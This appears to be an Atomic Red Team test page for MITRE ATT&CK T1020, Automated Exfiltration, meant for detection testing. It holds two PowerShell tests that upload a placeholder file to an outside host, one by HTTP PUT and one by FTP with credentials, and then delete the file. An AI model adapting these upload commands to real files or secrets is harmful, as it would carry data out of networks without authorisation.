Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file
Supported Platforms: Windows
auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
| Name | Description | Type | Default Value | |——|————-|——|—————| | file | Exfiltration File | string | C:\temp\T1020_exfilFile.txt| | domain | Destination Domain | url | https://google.com|
1
powershell
1
2
3
4
5
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
1
2
$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
Supported Platforms: Windows
auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
| Name | Description | Type | Default Value | |——|————-|——|—————| | sampleFile | Path of the sample file to exfiltrate. | String | C:\temp\T1020__FTP_sample.txt| | ftpServer | FTP server URL. | Url | ftp://example.com| | credentials | FTP server credentials. | String | [user:password]|
1
powershell
1
2
3
4
5
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
1
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore